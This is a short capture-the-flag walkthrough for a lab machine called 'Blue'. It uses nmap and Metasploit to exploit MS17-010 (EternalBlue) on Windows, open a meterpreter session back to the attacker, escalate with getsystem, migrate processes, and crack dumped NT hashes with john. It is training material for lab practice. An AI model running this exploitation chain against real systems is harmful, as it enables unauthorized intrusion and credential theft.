Blue

Deploy & hack into a Windows machine, leveraging common misconfigurations issues.

nmap -sV --script vuln $IP

Commands:

-sV – checks the version of the running services

–script vuln – runs some scripts so we can answer question

Now i won’t paste the whole output we are only interested in ms17-010. Now let’s open metasploit and confirm if the host if vulnerable or not:

msfconsole

Now we use the command search to find the module that we want:

search eternal

And we found it now let’s use it:

use auxiliary/scanner/smb/smb_ms17_010

Now we need to specify the rhost:

set rhost $IP
#to run the module type:
run

Output:

Sweet now we can use the exploit for Eternal Blue:

#type this to deselect the current module:
back
#now for the new module:
use exploit/windows/smb/ms17_010_eternalblue

Let’s see the options that we need to specify:

options

Let’s specify the rhost and we are good to go:

#target's ip
set rhost $ip
#your ip now:
set lhost tun0
run

And we are in:

Now we can migrate our process to another that is running from the user “authority\system”:

First type “getsystem” in the meterpreter in order to get more access so we can migrate the process. Then type:

migrate $numberoftheprocessyouchoose

Now we can dumb the hash and crack it:

echo "#thehashyoufound" > hash.hash

Now we can use john to crack the hashes:

john hash.hash --wordlist=/usr/share/wordlists/rockyou.txt --format=NT

The flags are located in the following directories:

Last updated 3 years ago